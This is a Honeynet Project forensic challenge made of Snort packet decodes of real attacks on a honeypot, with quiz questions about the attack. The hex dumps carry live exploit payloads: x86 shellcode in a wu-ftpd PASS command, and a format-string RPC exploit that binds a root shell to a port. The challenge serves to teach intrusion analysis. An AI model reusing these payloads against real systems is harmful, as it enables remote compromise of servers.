# # SCAN OF THE MONTH #10: 10 December # # Contest to see who can determine which tool was used # and the purpose of this scan. Packet decodes using snort # (http://www.snort.org). # # The packets were captured from the wild as part of the # Honeynet Project, http://project.honeynet.org QUESTIONS: ---------- Below are two exploit attacks ran against our Honeynet in the same day, specifically the system 172.16.1.104, a Linux RH 6.2 honeypot (default install). As you read through these signatures, the challenge is to answer the following questions: ### QUESTION 1: Can you name the FTP scanning tool? ### QUESTION 2: What does this FTP exploit achieve? Does it open a port, create a shell, add a user account? ### QUESTION 3: Is the FTP attack successful? ### QUESTION 4: What RPC service is exploited? ### QUESTION 5: Where in the exploit code below does he bind a shell to port 39168? ### QUESTION 6: What two accounts are created, and what are the UID's? THE SIGNATURES -------------- ### Bad guys starts off with a half open SYN scan of ### the network. ### QUESTION 1: Can you name the FTP scanning tool? =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:27:31.019086 207.219.207.240:10101 -> 172.16.1.104:21 TCP TTL:241 TOS:0x0 ID:51721 **S***** Seq: 0x64 Ack: 0x0 Win: 0x200 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:27:31.025315 172.16.1.104:21 -> 207.219.207.240:10101 TCP TTL:63 TOS:0x0 ID:48209 DF **S***A* Seq: 0x41C40069 Ack: 0x65 Win: 0x7FB8 TCP Options => MSS: 536 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:27:31.125575 207.219.207.240:10101 -> 172.16.1.104:21 TCP TTL:241 TOS:0x0 ID:65496 ****R*** Seq: 0x65 Ack: 0x0 Win: 0x0 ### Bad guys now completes a full TCP connect to the System. ### Notice how the IP and TCP Header information has changed now that ### the OS and not the tool are building the packets. TTL has gone ### from 241 to TTL of 50. Looks like this guys is 14 hops away. ### Notice how with the full connect, we have TCP Options and Window ### size that indicate Linux OS =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:36.825518 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:13905 DF **S***** Seq: 0xC331FCC5 Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 125865634 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:36.829397 172.16.1.104:21 -> 207.219.207.240:3464 TCP TTL:63 TOS:0x0 ID:48210 DF **S***A* Seq: 0xA03F7698 Ack: 0xC331FCC6 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 105623688 125865634 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:36.931933 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:13911 DF ******A* Seq: 0xC331FCC6 Ack: 0xA03F7699 Win: 0x7D78 TCP Options => NOP NOP TS: 125865645 105623688 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.159740 172.16.1.104:21 -> 207.219.207.240:3464 TCP TTL:63 TOS:0x10 ID:48215 DF *****PA* Seq: 0xA03F7699 Ack: 0xC331FCC6 Win: 0x7D78 TCP Options => NOP NOP TS: 105624021 125865645 32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser 76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu- 32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb 20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST 20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.271630 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:14254 DF ******A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78 TCP Options => NOP NOP TS: 125865980 105624021 ### Bad guy got the FTP version information, so he closes the connection. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.272824 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:14256 DF ***F**A* Seq: 0xC331FCC6 Ack: 0xA03F76E8 Win: 0x7D78 TCP Options => NOP NOP TS: 125865980 105624021 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.274083 172.16.1.104:21 -> 207.219.207.240:3464 TCP TTL:63 TOS:0x10 ID:48216 DF ******A* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78 TCP Options => NOP NOP TS: 105624032 125865980 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.274149 172.16.1.104:21 -> 207.219.207.240:3464 TCP TTL:63 TOS:0x10 ID:48217 DF *****PA* Seq: 0xA03F76E8 Ack: 0xC331FCC7 Win: 0x7D78 TCP Options => NOP NOP TS: 105624033 125865980 32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at 20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb 79 65 2E 0D 0A ye... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.277315 172.16.1.104:21 -> 207.219.207.240:3464 TCP TTL:63 TOS:0x10 ID:48219 DF ***F**A* Seq: 0xA03F770D Ack: 0xC331FCC7 Win: 0x7D78 TCP Options => NOP NOP TS: 105624033 125865980 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.375292 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:241 TOS:0x10 ID:14261 ****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-00:52:40.386029 207.219.207.240:3464 -> 172.16.1.104:21 TCP TTL:241 TOS:0x10 ID:14265 ****R*** Seq: 0xC331FCC7 Ack: 0x0 Win: 0x0 ### Looks like the bad guy is now done with FTP. He now moves ### onto RPC. First a UDP connection. Notice the Source port ### is less the 1024, bad guy is root on the remote system. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:23.939896 207.219.207.240:629 -> 172.16.1.104:111 UDP TTL:50 TOS:0x0 ID:53460 Len: 64 70 01 C4 19 00 00 00 00 00 00 00 02 00 01 86 A0 p............... 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 06 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:23.942134 172.16.1.104:111 -> 207.219.207.240:629 UDP TTL:63 TOS:0x0 ID:48220 Len: 36 70 01 C4 19 00 00 00 01 00 00 00 00 00 00 00 00 p............... 00 00 00 00 00 00 00 00 00 00 03 A5 ............ ### We now make a TCP connection to port 933. Most likely a probe ### for a vulnerable RPC service. However, a RST is returned, ### indicating no service is listening. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:24.046223 207.219.207.240:630 -> 172.16.1.104:933 TCP TTL:50 TOS:0x0 ID:53461 DF **S***** Seq: 0x33CB6C6D Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 126044347 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:24.047610 172.16.1.104:933 -> 207.219.207.240:630 TCP TTL:254 TOS:0x0 ID:48221 ****R*A* Seq: 0x0 Ack: 0x33CB6C6E Win: 0x0 ### Bad guys again makes a full TCP connection to FTP. This ### time he is up to something. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:27.617232 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53471 DF **S***** Seq: 0x33BC72A2 Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 126044705 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:27.618999 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x0 ID:48222 DF **S***A* Seq: 0x110CE78A Ack: 0x33BC72A3 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 105802758 126044705 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:27.713070 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53472 DF ******A* Seq: 0x33BC72A3 Ack: 0x110CE78B Win: 0x7D78 TCP Options => NOP NOP TS: 126044714 105802758 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:30.904850 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48227 DF *****PA* Seq: 0x110CE78B Ack: 0x33BC72A3 Win: 0x7D78 TCP Options => NOP NOP TS: 105803086 126044714 32 32 30 20 6B 79 6C 65 20 46 54 50 20 73 65 72 220 kyle FTP ser 76 65 72 20 28 56 65 72 73 69 6F 6E 20 77 75 2D ver (Version wu- 32 2E 36 2E 30 28 31 29 20 4D 6F 6E 20 46 65 62 2.6.0(1) Mon Feb 20 32 38 20 31 30 3A 33 30 3A 33 36 20 45 53 54 28 10:30:36 EST 20 32 30 30 30 29 20 72 65 61 64 79 2E 0D 0A 2000) ready... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.017415 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53474 DF ******A* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78 TCP Options => NOP NOP TS: 126045045 105803086 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.018970 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53475 DF *****PA* Seq: 0x33BC72A3 Ack: 0x110CE7DA Win: 0x7D78 TCP Options => NOP NOP TS: 126045045 105803086 55 53 45 52 20 66 74 70 0D 0A USER ftp.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.020239 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48228 DF ******A* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78 TCP Options => NOP NOP TS: 105803098 126045045 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.025534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48230 DF *****PA* Seq: 0x110CE7DA Ack: 0x33BC72AD Win: 0x7D78 TCP Options => NOP NOP TS: 105803098 126045045 33 33 31 20 47 75 65 73 74 20 6C 6F 67 69 6E 20 331 Guest login 6F 6B 2C 20 73 65 6E 64 20 79 6F 75 72 20 63 6F ok, send your co 6D 70 6C 65 74 65 20 65 2D 6D 61 69 6C 20 61 64 mplete e-mail ad 64 72 65 73 73 20 61 73 20 70 61 73 73 77 6F 72 dress as passwor 64 2E 0D 0A d... ### Okay, looks like we have an attack against FTP here. But what? ### Snort detects the attack and sends the following alert. ### Dec 9 01:22:31 firewall snort[6511]: IDS287 - FTP - Wuftp260 venglin linux: ### 207.219.207.240:1882 -> 172.16.1.104:21 ### This appears to be a format string and not a buffer overflow attack ### QUESTION 2: What does this FTP exploit achieve? Does it open a port, ### create a shell, add an account? =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.167035 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53476 DF *****PA* Seq: 0x33BC72AD Ack: 0x110CE81E Win: 0x7D78 TCP Options => NOP NOP TS: 126045057 105803098 50 41 53 53 20 90 90 90 90 90 90 90 90 90 90 90 PASS ........... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 31 C0 31 DB 31 C9 B0 46 CD .......1.1.1..F. 80 31 C0 31 DB 43 89 D9 41 B0 3F CD 80 EB 6B 5E .1.1.C..A.?...k^ 31 C0 31 C9 8D 5E 01 88 46 04 66 B9 FF FF 01 B0 1.1..^..F.f..... 27 CD 80 31 C0 8D 5E 01 B0 3D CD 80 31 C0 31 DB '..1..^..=..1.1. 8D 5E 08 89 43 02 31 C9 FE C9 31 C0 8D 5E 08 B0 .^..C.1...1..^.. 0C CD 80 FE C9 75 F3 31 C0 88 46 09 8D 5E 08 B0 .....u.1..F..^.. 3D CD 80 FE 0E B0 30 FE C8 88 46 04 31 C0 88 46 =.....0...F.1..F 07 89 76 08 89 46 0C 89 F3 8D 4E 08 8D 56 0C B0 ..v..F....N..V.. 0B CD 80 31 C0 31 DB B0 01 CD 80 E8 90 FF FF FF ...1.1.......... FF FF FF 30 62 69 6E 30 73 68 31 2E 2E 31 31 76 ...0bin0sh1..11v 65 6E 67 6C 69 6E 40 6B 6F 63 68 61 6D 2E 6B 61 englin@kocham.ka 73 69 65 2E 63 6F 6D 0D 0A sie.com.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.169534 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48231 DF *****PA* Seq: 0x110CE81E Ack: 0x33BC7446 Win: 0x7D78 TCP Options => NOP NOP TS: 105803113 126045057 35 33 30 20 4C 6F 67 69 6E 20 69 6E 63 6F 72 72 530 Login incorr 65 63 74 2E 0D 0A ect... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:31.285312 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53477 DF ******A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78 TCP Options => NOP NOP TS: 126045072 105803113 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.876754 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:50 TOS:0x0 ID:53479 DF ***F**A* Seq: 0x33BC7446 Ack: 0x110CE834 Win: 0x7D78 TCP Options => NOP NOP TS: 126045931 105803113 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.878137 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48232 DF ******A* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78 TCP Options => NOP NOP TS: 105803984 126045931 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.878150 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48233 DF *****PA* Seq: 0x110CE834 Ack: 0x33BC7447 Win: 0x7D78 TCP Options => NOP NOP TS: 105803984 126045931 32 32 31 20 59 6F 75 20 63 6F 75 6C 64 20 61 74 221 You could at 20 6C 65 61 73 74 20 73 61 79 20 67 6F 6F 64 62 least say goodb 79 65 2E 0D 0A ye... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.880154 172.16.1.104:21 -> 207.219.207.240:1882 TCP TTL:63 TOS:0x10 ID:48234 DF ***F**A* Seq: 0x110CE859 Ack: 0x33BC7447 Win: 0x7D78 TCP Options => NOP NOP TS: 105803984 126045931 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.979538 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:241 TOS:0x10 ID:53481 ****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-01:22:39.983316 207.219.207.240:1882 -> 172.16.1.104:21 TCP TTL:241 TOS:0x10 ID:53482 ****R*** Seq: 0x33BC7447 Ack: 0x0 Win: 0x0 ### The FTP attack is all done. ### QUESTION 3: Is the FTP attack successful? ### Six hours later a new attack. Is it the same person coming ### from a different IP address, or is this unrelated? The bad ### guy starts off with a RPC probe. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:10.138117 207.19.5.25:709 -> 172.16.1.104:111 UDP TTL:49 TOS:0x0 ID:48624 Len: 64 2F 99 8C 57 00 00 00 00 00 00 00 02 00 01 86 A0 /..W............ 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:10.144426 172.16.1.104:111 -> 207.19.5.25:709 UDP TTL:63 TOS:0x0 ID:48239 Len: 36 2F 99 8C 57 00 00 00 01 00 00 00 00 00 00 00 00 /..W............ 00 00 00 00 00 00 00 00 00 00 03 A3 ............ ### He finds a vulnerability and immediately launches into a ### RPC exploit. This exploit appears to create a /bin/sh listening ### port 39168. He immediately connects to this port after the ### exploit. Snort detected the attack and sent the following alert. ### Dec 9 07:17:10 firewall snort[6511]: IDS362 - MISC - Shellcode X86 NOPS-UDP: ### 207.19.5.25:710 -> 172.16.1.104:931 ### QUESTION 4: What RPC service is exploited? ### QUESTION 5: Where in the exploit code below does he bind a shell ### to port 39168? =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:10.595325 207.19.5.25:710 -> 172.16.1.104:931 UDP TTL:49 TOS:0x0 ID:48712 Len: 1084 0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT............. 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:12.552539 207.19.5.25:710 -> 172.16.1.104:931 UDP TTL:49 TOS:0x0 ID:48941 Len: 1084 0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT............. 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 